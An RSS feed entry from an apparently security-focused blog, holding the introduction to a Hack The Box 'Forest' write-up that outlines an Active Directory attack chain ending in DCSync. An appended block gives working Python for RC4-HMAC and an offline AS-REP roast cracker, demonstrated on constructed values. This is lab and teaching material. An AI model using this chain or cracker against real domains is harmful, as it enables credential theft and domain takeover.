<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Dcsync on appl3b0y</title>
    <link>https://appl3b0y.com/tags/dcsync/</link>
    <description>Recent content in Dcsync on appl3b0y</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 23 Jun 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://appl3b0y.com/tags/dcsync/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Forest</title>
      <link>https://appl3b0y.com/writeups/forest/</link>
      <pubDate>Tue, 23 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/forest/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Forest&lt;/strong&gt; is an easy Windows machine, but it is easy only if you already speak Active Directory. There is no web app, no CVE, no memory corruption. The whole box is a chain of AD misconfigurations that you unlock by reading enumeration output and by trusting what BloodHound draws for you.&lt;/p&gt;&#xA;&lt;p&gt;The path looks like this: the domain controller accepts an &lt;strong&gt;anonymous RPC session&lt;/strong&gt; (a null session), which leaks the full list of domain users. One of those users, &lt;code&gt;svc-alfresco&lt;/code&gt;, has Kerberos &lt;strong&gt;pre-authentication disabled&lt;/strong&gt;, so the KDC hands anyone who asks an AS-REP for him; the encrypted part of that reply is keyed with his password, and we crack it offline. A shell as that user lands us in a domain where &lt;code&gt;svc-alfresco&lt;/code&gt; sits (through nested groups) inside &lt;strong&gt;Account Operators&lt;/strong&gt;, which can edit the membership of groups not protected by AdminSDHolder, including &lt;strong&gt;Exchange Windows Permissions&lt;/strong&gt;. That group holds &lt;strong&gt;WriteDACL&lt;/strong&gt; over the domain object itself, so a member can grant himself the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that &lt;strong&gt;DCSync&lt;/strong&gt; needs, and from there pull the Administrator hash.&lt;/p&gt;</description>
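      <![CDATA[
The AS-REP roast step above, worked offline, as an added example that is not code from the writeup. It implements both sides of RC4-HMAC (etype 23, RFC 4757): what the KDC does when it encrypts the AS-REP for an account with pre-authentication disabled, and what hashcat mode 18200 does with the resulting $krb5asrep$23$ line. The password "Winter2019!", the realm EXAMPLE.LOCAL, the wordlist and the placeholder enc-part bytes are constructed for the example and are not the box's values; key usage 8 is what Windows KDCs use for the AS-REP enc-part and what the hashcat format assumes. MD4 is implemented in pure Python because hashlib's md4 is missing on OpenSSL 3 builds.

```python
"""AS-REP roasting worked offline (RC4-HMAC, etype 23). Added example;
the password, realm, wordlist and plaintext below are constructed."""
import hashlib
import hmac
import os
from typing import Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); no dependency on hashlib.new('md4')."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + (8 * len(data)).to_bytes(8, "little")
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = [int.from_bytes(msg[off + 4 * i:off + 4 * i + 4], "little") for i in range(16)]
        a, b, c, d = h
        for i in range(16):  # round 1: message words in order
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: words 0,8,4,12,2,10,...
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return b"".join(x.to_bytes(4, "little") for x in h)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


# Windows KDCs encrypt the AS-REP enc-part under key usage 8 (noted in
# RFC 4757); the $krb5asrep$23$ hashcat format assumes the same.
ASREP_USAGE = 8


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> tuple:
    """KDC side (RFC 4757 section 6): returns (checksum, ciphertext)."""
    k1 = _hmac_md5(key, usage.to_bytes(4, "little"))
    body = os.urandom(8) + plaintext  # 8-byte confounder, then the data
    checksum = _hmac_md5(k1, body)
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, body)


def rc4_hmac_decrypt(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> Optional[bytes]:
    """Attacker side: plaintext if the key verifies the checksum, else None."""
    k1 = _hmac_md5(key, usage.to_bytes(4, "little"))
    k3 = _hmac_md5(k1, checksum)
    body = rc4(k3, ciphertext)
    if not hmac.compare_digest(_hmac_md5(k1, body), checksum):
        return None
    return body[8:]


def hashcat_line(user: str, realm: str, checksum: bytes, ciphertext: bytes) -> str:
    """Same layout GetNPUsers.py -format hashcat prints."""
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}:{ciphertext.hex()}"


def crack_asrep(line: str, wordlist) -> Optional[str]:
    """Offline guess verification: the KDC is not contacted again."""
    _, chk_hex, enc_hex = line.rsplit(":", 2)
    checksum, ciphertext = bytes.fromhex(chk_hex), bytes.fromhex(enc_hex)
    for guess in wordlist:
        if rc4_hmac_decrypt(nt_hash(guess), ASREP_USAGE, checksum, ciphertext) is not None:
            return guess
    return None


def demo() -> Optional[str]:
    # Constructed stand-in for the DER EncASRepPart (tag 0x79) that carries
    # the TGT session key; any bytes show the mechanism.
    enc_part = b"\x79\x81\xde" + b"\x00" * 32
    chk, ct = rc4_hmac_encrypt(nt_hash("Winter2019!"), ASREP_USAGE, enc_part)
    line = hashcat_line("svc-alfresco", "EXAMPLE.LOCAL", chk, ct)
    return crack_asrep(line, ["password", "Welcome1", "Winter2019!", "Summer2020"])


if __name__ == "__main__":
    print(demo())
```

Each guess costs one MD4, three HMAC-MD5s and one RC4 pass, with nothing sent to the DC and no lockout counter touched, which is exactly why an account with DONT_REQ_PREAUTH set is a finding on its own. Real crackers check the 0x79 ASN.1 tag of the decrypted enc-part before the full checksum to discard wrong keys faster; the checksum comparison here is the authoritative test.
]]>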
    </item>
  </channel>
</rss>
